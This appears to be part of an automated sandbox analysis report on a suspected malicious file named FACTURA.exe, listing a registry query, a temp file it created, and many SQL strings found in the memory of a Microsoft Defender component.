Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InProcServer32

Source: C:\Users\user\Desktop\FACTURA.exe

File created: C:\Users\user\AppData\Local\Temp\~DFB539126E96AF4C2D.TMP

Jump to behavior

Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp	Binary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AnomalyInfo(Key, UnbiasedTime) VALUES (?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(13, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM AutoFeatureControl;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT DISTINCT TableName FROM AnomalyTables;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO RollingQueuesTables(Key, Name, Capacity, TimeToLive, Mode) VALUES(? , ? , ? , ? , ?); DELETE FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?; DELETE FROM RollingQueuesTables WHERE (Name NOT IN (SELECT DISTINCT EntryTable FROM RollingQueuesValues)); SELECT Key, Name, Capacity, TimeToLive, Mode FROM RollingQueuesTables WHERE Key = ?; SELECT Key FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?; SELECT EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime FROM RollingQueuesValues WHERE EntryTable = ?; INSERT INTO RollingQueuesValues(EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); DELETE FROM RollingQueuesValues WHERE ExpireTime < ?; DELETE FROM RollingQueuesTables; DELETE FROM RollingQueuesValues; SELECT COUNT(1) FROM RollingQueuesValues; Failed to fetch row from prepared statement.Failed to get column from prepared statement.Failed to bind value to prepared statement.
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM FileHashes WHERE FileHashes.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM RansomwareDetections;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM NetworkIpFirewallRules;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO RollingQueuesValues(EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime, UpdateTime FROM AtomicCounters WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n FROM FileHashes WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AutoFeatureControl(Key, CurrCount, MaxCount, InstanceTimeStamp) VALUES (?, ?, ?, ?);DELETE FROM AutoFeatureControl;DELETE FROM AutoFeatureControl WHERE InstanceTimeStamp < ?; SELECT ID FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;SELECT Key, CurrCount, MaxCount, InstanceTimeStamp FROM AutoFeatureControl WHERE Key = ?DELETE FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;SELECT Count(1) FROM AutoFeatureControl;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM FileLowFiAsync;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces FROM BackupProcessInfo WHERE Key = ?;SELECT Count(1) FROM BackupProcessInfo;SELECT ID FROM BackupProcessInfo WHERE Key = ?;INSERT INTO BackupProcessInfo(Key, FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?);DELETE FROM BackupProcessInfo WHERE Key = ?;DELETE FROM BackupProcessInfo WHERE InstanceTimeStamp < ?; ^;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID from RecordIdentifier WHERE Key = ? AND RecordTimeStamp = ? ;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(6, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(14, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;SELECT UserId, GUID, Path FROM FolderGuardPaths WHERE UserIdHash = ?SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;DELETE FROM FolderGuardPaths WHERE UserIdHash = ?;N
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(4, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, Name, Capacity, TimeToLive, Mode FROM RollingQueuesTables WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmFileStartupActions(FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(5, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO RansomwareDetections(Key, DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(12, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE ExpirationDate < DateTime(?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE RecordIdentifier.ID IN (SELECT FileInstance.RecordID from FileInstance WHERE FileInstance.ParentRecordID = ? );
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT RuleAction, RuleId, IsAudit, IsInherited, State FROM BmHipsRuleInfo WHERE ProcessInfoId = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, FirewallRuleName, ExpiryTime FROM NetworkIpFirewallRules WHERE ExpiryTime < ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM SystemFileCache;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM SdnEx;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(3, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO FileInstance(InstanceTimeStamp, RecordID, ScanID, TrackingEnabled, StorageEvent, StorageEventState, ModificationsCount, ParentRecordID, Parent_FileEvent, Parent_FileName, Parent_ProcessID, Remote_ProcessID, FileID, FileName, USN, CreateTime, LastAccessTime, LastWriteTime, Signer, SignerHash, Issuer, SigningTime, MOTW, MOTWFromParent,IsValidCert, CertInvalidDetails, IsCatalogSigned) VALUES(?, ? , ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime FROM RollingQueuesValues WHERE EntryTable = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Version, Current, LastUpdated FROM SQLiteGlobals WHERE Current = 1 ORDER BY Version DESC ;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM AmsiFileCache WHERE AmsiFileCache.PersistId = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AttributeCounts(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(28, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID from File WHERE SHA1 = ? ;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO ScanInfo(SigSeq, PersistSigSeq, ProgenitorPersistSigSeq, ScanAgent, NamedAttributes, PeAttributes, SigAttrEvents, ScanReason, WebURL, EngineID, SigSha) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM Engine WHERE EngineVersion = ? AND SigVersion = ? ;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AmsiFileCache(PersistId, PersistIdBlob, ExpirationDate) VALUES (?, ?, DateTime('now', ?));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM SdnEx WHERE SdnEx.Key = ?;SELECT Key, CurrentCount FROM SdnEx WHERE Key = ?DELETE FROM SdnEx WHERE SdnEx.Key = ?;SELECT Count(1) FROM SdnEx;INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);DELETE FROM SdnEx;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AttributePersistContext;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM SystemRegistryCache;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(24, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(11, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);SELECT Count(1) FROM DynSigRevisions;DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6229929208.0000019793FDC000.00000004.00000001.sdmp	Binary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;Engine.MetaStore.DBVaultUtilizationMpDisableTaskSchedCmdLineScanMb=Lk
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AnomalyTables(Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(16, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(8, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(26, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_ FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AnomalyTables;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM FileHashes; DELETE FROM FileHashes WHERE FileHashes.Key = ?; DELETE FROM FileHashes WHERE InstanceTimeStamp < ?; INSERT INTO FileHashes(Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n) VALUES(?, ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?);SELECT Key FROM FileHashes WHERE FileHashes.Key = ?; SELECT Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n FROM FileHashes WHERE Key = ?; SELECT Key FROM FileHashes ORDER BY InstanceTimeStamp ASC LIMIT 1
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(30, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?; SELECT COUNT(1) FROM FileLowFiAsync; DELETE FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; DELETE FROM FileLowFiAsync WHERE InstanceTimeStamp < ?; INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID, PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High FROM BmProcessInfo WHERE PPIDHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AutoFeatureControl(Key, CurrCount, MaxCount, InstanceTimeStamp) VALUES (?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(20, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE PersistId = ?;
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(18, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BmProcessInfo WHERE PPIDHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AnomalyInfo;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ValueMapArrayBlob FROM ValueMapArray WHERE Key = ? AND RecordType = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AttributeCounts WHERE AttributeCounts.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT Count(1) FROM DynSigRevisions;SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AttributeCounts ORDER BY InsertTime ASC LIMIT 1;
